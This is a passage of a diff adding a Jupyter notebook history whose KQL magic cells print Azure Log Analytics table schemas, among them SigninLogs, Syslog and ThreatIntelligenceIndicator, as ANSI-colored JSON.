\u001b[94m\"ServiceTypeName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SlowCancellationTimeMillis\"\u001b[39;49;00m: \u001b[33m\"real\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TaskName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Tid\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"WasCanceled\"\u001b[39;49;00m: \u001b[33m\"bool\"\u001b[39;49;00m\n    },\n    \u001b[94m\"SigninLogs\"\u001b[39;49;00m: {\n        \u001b[94m\"AADTenantId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"AppDisplayName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"AppId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Category\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ClientAppUsed\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ConditionalAccessPolicies\"\u001b[39;49;00m: \u001b[33m\"dynamic\"\u001b[39;49;00m,\n        \u001b[94m\"ConditionalAccessStatus\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CorrelationId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CreatedDateTime\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"DeviceDetail\"\u001b[39;49;00m: \u001b[33m\"dynamic\"\u001b[39;49;00m,\n        \u001b[94m\"DurationMs\"\u001b[39;49;00m: \u001b[33m\"long\"\u001b[39;49;00m,\n        \u001b[94m\"IPAddress\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Id\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Identity\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"IsRisky\"\u001b[39;49;00m: \u001b[33m\"bool\"\u001b[39;49;00m,\n        \u001b[94m\"Level\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Location\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"LocationDetails\"\u001b[39;49;00m: \u001b[33m\"dynamic\"\u001b[39;49;00m,\n        \u001b[94m\"OperationName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OperationVersion\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OriginalRequestId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Resource\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceDisplayName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceGroup\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceProvider\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResultDescription\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResultSignature\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResultType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RiskDetail\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RiskEventTypes\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RiskLevelAggregated\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RiskLevelDuringSignIn\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RiskState\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Status\"\u001b[39;49;00m: \u001b[33m\"dynamic\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"UserDisplayName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"UserId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"UserPrincipalName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"Syslog\"\u001b[39;49;00m: {\n        \u001b[94m\"Computer\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"EventTime\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"Facility\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"HostIP\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"HostName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ProcessID\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"ProcessName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SeverityLevel\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SyslogMessage\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"_ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"ThreatIntelligenceIndicator\"\u001b[39;49;00m: {\n        \u001b[94m\"Action\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Active\"\u001b[39;49;00m: \u001b[33m\"bool\"\u001b[39;49;00m,\n        \u001b[94m\"ActivityGroupNames\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"AdditionalInformation\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ConfidenceScore\"\u001b[39;49;00m: \u001b[33m\"real\"\u001b[39;49;00m,\n        \u001b[94m\"Description\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DiamondModel\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DomainName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"EmailEncoding\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"EmailLanguage\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"EmailRecipient\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"EmailSenderAddress\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"EmailSenderName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"EmailSourceDomain\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"EmailSourceIpAddress\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"EmailSubject\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"EmailXMailer\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ExpirationDateTime\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"ExternalIndicatorId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"FileCompileDateTime\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"FileCreatedDateTime\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"FileHashType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"FileHashValue\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"FileMutexName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"FileName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"FilePacker\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"FilePath\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"FileSize\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"FileType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"IndicatorId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"KillChainActions\"\u001b[39;49;00m: \u001b[33m\"bool\"\u001b[39;49;00m,\n        \u001b[94m\"KillChainC2\"\u001b[39;49;00m: \u001b[33m\"bool\"\u001b[39;49;00m,\n        \u001b[94m\"KillChainDelivery\"\u001b[39;49;00m: \u001b[33m\"bool\"\u001b[39;49;00m,\n        \u001b[94m\"KillChainExploitation\"\u001b[39;49;00m: \u001b[33m\"bool\"\u001b[39;49;00m,\n        \u001b[94m\"KillChainReconnaissance\"\u001b[39;49;00m: \u001b[33m\"bool\"\u001b[39;49;00m,\n        \u001b[94m\"KillChainWeaponization\"\u001b[39;49;00m: \u001b[33m\"bool\"\u001b[39;49;00m,\n        \u001b[94m\"KnownFalsePositives\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"MalwareNames\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"NetworkCidrBlock\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"NetworkDestinationAsn\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"NetworkDestinationCidrBlock\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"NetworkDestinationIP\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"NetworkDestinationPort\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"NetworkIP\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"NetworkPort\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"NetworkProtocol\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"NetworkSourceAsn\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"NetworkSourceCidrBlock\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"NetworkSourceIP\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"NetworkSourcePort\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"PassiveOnly\"\u001b[39;49;00m: \u001b[33m\"bool\"\u001b[39;49;00m,\n        \u001b[94m\"Tags\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ThreatSeverity\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"ThreatType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"TrafficLightProtocolLevel\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Url\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"UserAgent\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"Usage\"\u001b[39;49;00m: {\n        \u001b[94m\"AvgLatencyInSeconds\"\u001b[39;49;00m: \u001b[33m\"real\"\u001b[39;49;00m,\n        \u001b[94m\"BatchesCapped\"\u001b[39;49;00m: \u001b[33m\"long\"\u001b[39;49;00m,\n        \u001b[94m\"BatchesOutsideSla\"\u001b[39;49;00m: \u001b[33m\"long\"\u001b[39;49;00m,\n        \u001b[94m\"BatchesWithinSla\"\u001b[39;49;00m: \u001b[33m\"long\"\u001b[39;49;00m,\n        \u001b[94m\"Computer\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DataType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"EndTime\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"IsBillable\"\u001b[39;49;00m: \u001b[33m\"bool\"\u001b[39;49;00m,\n        \u001b[94m\"LinkedMeterId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"LinkedResourceUri\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"MeterId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Quantity\"\u001b[39;49;00m: \u001b[33m\"real\"\u001b[39;49;00m,\n        \u001b[94m\"QuantityUnit\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceUri\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Solution\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"StartTime\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"TotalBatches\"\u001b[39;49;00m: \u001b[33m\"long\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"W3CIISLog\"\u001b[39;49;00m: {\n        \u001b[94m\"AzureDeploymentID\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Computer\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Confidence\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Description\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"FirstReportedDateTime\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"IndicatorThreatType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"IsActive\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"LastReportedDateTime\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"MaliciousIP\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ManagementGroupName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RemoteIPCountry\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RemoteIPLatitude\"\u001b[39;49;00m: \u001b[33m\"real\"\u001b[39;49;00m,\n        \u001b[94m\"RemoteIPLongitude\"\u001b[39;49;00m: \u001b[33m\"real\"\u001b[39;49;00m,\n        \u001b[94m\"Role\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RoleInstance\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Severity\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"StorageAccount\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TLPLevel\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"TimeTaken\"\u001b[39;49;00m: \u001b[33m\"long\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"_ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"cIP\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"csBytes\"\u001b[39;49;00m: \u001b[33m\"long\"\u001b[39;49;00m,\n        \u001b[94m\"csCookie\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"csHost\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"csMethod\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"csReferer\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"csUriQuery\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"csUriStem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"csUserAgent\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"csUserName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"csVersion\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"sIP\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"sPort\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"sSiteName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"scBytes\"\u001b[39;49;00m: \u001b[33m\"long\"\u001b[39;49;00m,\n        \u001b[94m\"scStatus\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"scSubStatus\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"scWin32Status\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    }\n}"
+       },
+       "execution_count": 14,
+       "metadata": {},
+       "output_type": "execute_result"
+      }
+     ],
+     "persistentId": "53af05b4-61af-4e19-9720-f03ca043969e",
+     "text": "%kql --schema"
+    },
+    "executionTime": "2019-08-15T21:17:38.587Z"
+   },
+   {
+    "cell": {
+     "executionCount": 15,
+     "executionEventId": "88dc76b5-a442-4015-8e5d-a019c1138e1d",
+     "hasError": false,
+     "id": "c591dfa1-6746-4363-ad43-da0e669ecb0b",
+     "outputs": [
+      {
+       "data": {
+        "text/html": "<html>\n        <head>\n        \n        </head>\n        <body>\n        <div><p style='padding: 10px; color: #b94a48; background-color: #f2dede; border-color: #eed3d7'>unknown&nbsp;option</p></div>\n        </body>\n        </html>",
+        "text/plain": "<IPython.core.display.HTML object>"
+       },
+       "metadata": {},
+       "output_type": "display_data"
+      }
+     ],
+     "persistentId": "53af05b4-61af-4e19-9720-f03ca043969e",
+     "text": "%kql sch << --schema"
+    },
+    "executionTime": "2019-08-15T21:18:02.466Z"
+   },
+   {
+    "cell": {
+     "executionCount": 16,
+     "executionEventId": "33796ba2-ad58-407d-bcc5-0e713f4916f5",
+     "hasError": false,
+     "id": "c591dfa1-6746-4363-ad43-da0e669ecb0b",
+     "outputs": [
+      {
+       "data": {
+        "text/plain": "{\n    \u001b[94m\"AADDomainServicesAccountLogon\"\u001b[39;49;00m: {\n        \u001b[94m\"Category\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CertIssuerName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CertSerialNumber\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CertThumbprint\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ClientUserName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CorrelationId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"FailureCode\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"IpAddress\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"IpPort\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"MappedName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"MappingBy\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OperationName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"PackageName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"PreAuthType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RecordId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResultDescription\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResultType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ServiceName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TicketOptions\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"_ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"AADDomainServicesAccountManagement\"\u001b[39;49;00m: {\n        \u001b[94m\"AccountExpires\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"AllowedToDelegateTo\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CallerProcessId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CallerProcessName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Category\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ComputerAccountChange\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CorrelationId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DisplayName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DnsHostName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"GroupTypeChange\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"HomeDirectory\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"HomePath\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"LogonHours\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"MemberName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"MemberSid\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"MembershipExpirationTime\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"NewTargetUserName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"NewUacValue\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OldTargetUserName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OldUacValue\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OperationName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"PasswordLastSet\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"PrimaryGroupId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"PrivilegeList\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ProfilePath\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RecordId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResultDescription\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResultType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SamAccountName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ScriptPath\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ServicePrincipalNames\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SidHistory\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSid\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceUserName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Status\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SubjectDomainName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SubjectLogonId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SubjectUserName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SubjectUserSid\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TargetSid\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        